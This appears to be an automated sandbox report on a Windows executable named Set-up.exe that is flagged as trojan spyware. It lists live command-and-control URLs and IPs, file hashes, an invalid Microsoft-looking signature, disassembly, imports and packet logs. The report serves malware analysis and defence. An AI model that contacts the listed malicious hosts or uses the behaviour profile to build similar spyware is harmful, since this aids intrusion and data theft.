      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlSet-up.exefalse
          high
          http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://html4/loose.dtdSet-up.exefalse
            high
            https://httpbin.org/ipbeforeSet-up.exefalse
              high
              http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olNSet-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://curl.se/docs/http-cookies.htmlSet-up.exefalse
                high
                https://curl.se/docs/hsts.html#Set-up.exefalse
                  high
                  http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://home.eleventj11vt.top/olNSet-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=Set-up.exe, 00000000.00000002.1856204201.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854768134.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855090533.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853946639.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://httpbin.org/ipISet-up.exe, 00000000.00000003.1676246691.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://curl.se/docs/alt-svc.htmlSet-up.exefalse
                    high
                    http://.cssSet-up.exefalse
                      high
                      http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435Set-up.exefalse
                      • Avira URL Cloud: malware
                      unknown
                      http://.jpgSet-up.exefalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        34.147.147.173
                        home.eleventj11vt.topUnited States
                        2686ATGS-MMD-ASUSfalse
                        34.200.57.114
                        httpbin.orgUnited States
                        14618AMAZON-AESUSfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582848
                        Start date and time:2024-12-31 16:41:21 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 43s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Set-up.exe
                        Detection:MAL
                        Classification:mal72.troj.spyw.evad.winEXE@1/0@6/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 79%
                        • Number of executed functions: 47
                        • Number of non-executed functions: 152
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        10:42:28API Interceptor3x Sleep call for process: Set-up.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        34.147.147.173TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                        • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                        XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                        • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                        Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                        • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                        34.200.57.114TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                          joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                            Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                              JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                  ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    home.eleventj11vt.topSet-up.exeGet hashmaliciousUnknownBrowse
                                    • 194.87.58.155
                                    httpbin.orgTX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AMAZON-AESUSTX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    ATGS-MMD-ASUSTX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                    • 34.147.147.173
                                    XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                    • 34.147.147.173
                                    Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.147.147.173
                                    http://usps.com-trackaddn.top/lGet hashmaliciousUnknownBrowse
                                    • 34.54.88.138
                                    cbr.x86.elfGet hashmaliciousMiraiBrowse
                                    • 57.13.227.38
                                    https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                    • 34.36.178.232
                                    kwari.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 48.233.101.215
                                    kwari.arm.elfGet hashmaliciousUnknownBrowse
                                    • 57.204.182.195
                                    kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 57.206.149.213
                                    kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                    • 34.31.161.194
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):5.909645086783083
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                    • InstallShield setup (43055/19) 0.43%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Set-up.exe
                                    File size:7'793'288 bytes
                                    MD5:3d060ec62ad0864cfd0d40f46a4f07a9
                                    SHA1:8caba4598d19477a1e4442c4c710fa3909023c5b
                                    SHA256:6f80bb8b470640ae7542eb1b239f2a790d61047254accccf747c4d64907fec66
                                    SHA512:40e7f3407eec75b9ea5027387e2e5de294e6131f6ef00cda7640a6fb93a7e514683895066e509df817fd4de85854969fba8d01dedb40826e4bb59e28981f127d
                                    SSDEEP:49152:zINwrsavev5BI2tev8aclalc6UnNaxT1jvwgJr0vJnWShbKsqBIKTlblgPyz8wA/:zIQsX5BMvh64cxnMxRjVJQxPKTSyz8/
                                    TLSH:A8763951EE8790F9C58315715016B37F6E34AF00A835DEB6CFD1FB34DA72A12AA0E618
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sg...............(..K...v..2...........0K...@..........................pw.....5.v...@... ............................
                                    Icon Hash:90cececece8e8eb0
                                    Entrypoint:0x4014a0
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x6773C307 [Tue Dec 31 10:10:15 2024 UTC]
                                    TLS Callbacks:0x7890e0, 0x789090
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:51b39aff649af7abc30a06f2362db069
                                    Signature Valid:false
                                    Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                                    Signature Validation Error:A certificate chain could not be built to a trusted root authority
                                    Error Number:-2146762486
                                    Not Before, Not After
                                    • 26/08/2024 17:01:06 21/08/2025 17:01:06
                                    Subject Chain
                                    • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                                    Version:3
                                    Thumbprint MD5:80B98BC56A1BC892D2F111169DBCB122
                                    Thumbprint SHA-1:ED3C9DEEB4AD4483F925E20DD4695116DADC4D67
                                    Thumbprint SHA-256:0A1BB301BB5F2A584E394CCF57086623A464843269DD8A115FA4FC3509DB3EDC
                                    Serial:33009F7B734DB0480411EB0BBA0000009F7B73
                                    Instruction
                                    mov dword ptr [00B3B658h], 00000001h
                                    jmp 00007F7774B7DE16h
                                    nop
                                    mov dword ptr [00B3B658h], 00000000h
                                    jmp 00007F7774B7DE06h
                                    nop
                                    sub esp, 1Ch
                                    mov eax, dword ptr [esp+20h]
                                    mov dword ptr [esp], eax
                                    call 00007F7774F05676h
                                    cmp eax, 01h
                                    sbb eax, eax
                                    add esp, 1Ch
                                    ret
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    push ebp
                                    mov ebp, esp
                                    push edi
                                    push esi
                                    push ebx
                                    sub esp, 1Ch
                                    mov dword ptr [esp], 009E2000h
                                    call dword ptr [00B3D9A8h]
                                    sub esp, 04h
                                    test eax, eax
                                    je 00007F7774B7E1D5h
                                    mov ebx, eax
                                    mov dword ptr [esp], 009E2000h
                                    call dword ptr [00B3DA1Ch]
                                    mov edi, dword ptr [00B3D9BCh]
                                    sub esp, 04h
                                    mov dword ptr [00B39028h], eax
                                    mov dword ptr [esp+04h], 009E2013h
                                    mov dword ptr [esp], ebx
                                    call edi
                                    sub esp, 08h
                                    mov esi, eax
                                    mov dword ptr [esp+04h], 009E2029h
                                    mov dword ptr [esp], ebx
                                    call edi
                                    sub esp, 08h
                                    mov dword ptr [008B3004h], eax
                                    test esi, esi
                                    je 00007F7774B7E173h
                                    mov dword ptr [esp+04h], 00B3902Ch
                                    mov dword ptr [esp], 00B34104h
                                    call esi
                                    mov dword ptr [esp], 00401580h
                                    call 00007F7774B7E0C3h
                                    lea esp, dword ptr [ebp-0Ch]
                                    pop ebx
                                    pop esi
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73d0000x2dac.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x76e4000x688.reloc
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7420000x3441c.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x729c200x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x73d8140x620.idata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x4b1afc0x4b1c000376523a3320321e6f615080586e83abunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .data0x4b30000x12e0240x12e2005b3503c3e26e0a34435a86db21560bd8False0.020004783822920976dBase III DBT, version number 0, next free block index 10, 1st item "1={"0.29475031293532666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rdata0x5e20000x151a580x151c00879e9493847d67b979679fddd1d64dcaFalse0.42061941964285715data6.277693877886275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .eh_fram0x7340000x4d640x4e006c17222928a7366f1135f39586b97ba6False0.3195612980769231data4.898658234523789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .bss0x7390000x31800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata0x73d0000x2dac0x2e00567768f33a53c46b0def6d69e22b7524False0.36931046195652173data5.457987373518599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .CRT0x7400000x300x200fe2a65d4187b984679c52ae93485940eFalse0.0625data0.2233456448570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .tls0x7410000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .reloc0x7420000x3441c0x3460002e0623c7d8d841233f429ead242f2e6False0.49903975238663484data6.65692879978424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    DLLImport
                                    ADVAPI32.dllCryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
                                    bcrypt.dllBCryptGenRandom
                                    CRYPT32.dllCertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
                                    GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
                                    gdiplus.dllGdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
                                    IPHLPAPI.DLLConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
                                    KERNEL32.dllAcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
                                    msvcrt.dll__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
                                    ole32.dllCreateStreamOnHGlobal
                                    SHELL32.dllSHGetKnownFolderPath
                                    api-ms-win-crt-convert-l1-1-0.dllatoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
                                    api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
                                    api-ms-win-crt-filesystem-l1-1-0.dll_fstat64, _stat64, _unlink
                                    api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                                    api-ms-win-crt-locale-l1-1-0.dllsetlocale
                                    api-ms-win-crt-math-l1-1-0.dll_fdopen
                                    api-ms-win-crt-private-l1-1-0.dllmemchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
                                    api-ms-win-crt-runtime-l1-1-0.dll_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
                                    api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
                                    api-ms-win-crt-string-l1-1-0.dll_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
                                    api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
                                    api-ms-win-crt-utility-l1-1-0.dll_byteswap_uint64, bsearch, qsort, rand, srand
                                    USER32.dllCharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
                                    WS2_32.dllWSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 16:42:12.330857038 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:12.330900908 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:12.330960035 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:12.333822966 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:12.333837986 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.015984058 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.016459942 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.016482115 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.017995119 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.018054008 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.019407988 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.019479990 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.028412104 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.028422117 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.083158016 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.159773111 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.159822941 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:13.159913063 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.160870075 CET49730443192.168.2.434.200.57.114
                                    Dec 31, 2024 16:42:13.160891056 CET4434973034.200.57.114192.168.2.4
                                    Dec 31, 2024 16:42:25.676491022 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.681356907 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.681444883 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.682598114 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.687449932 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687465906 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687491894 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687504053 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687517881 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687525988 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.687560081 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.687575102 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.687645912 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687659979 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687707901 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.687803984 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687817097 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.687854052 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.687869072 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.692081928 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692133904 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.692326069 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692338943 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692379951 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.692395926 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692409039 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692437887 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692451954 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.692472935 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.692514896 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.735059023 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.735238075 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.782934904 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.783005953 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.834916115 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.834988117 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.888561010 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.888659000 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.934957027 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.935153008 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:25.982990980 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:25.983263969 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:26.030960083 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.031052113 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:26.082954884 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.083141088 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:26.125679970 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.126025915 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:26.138358116 CET804973134.147.147.173192.168.2.4
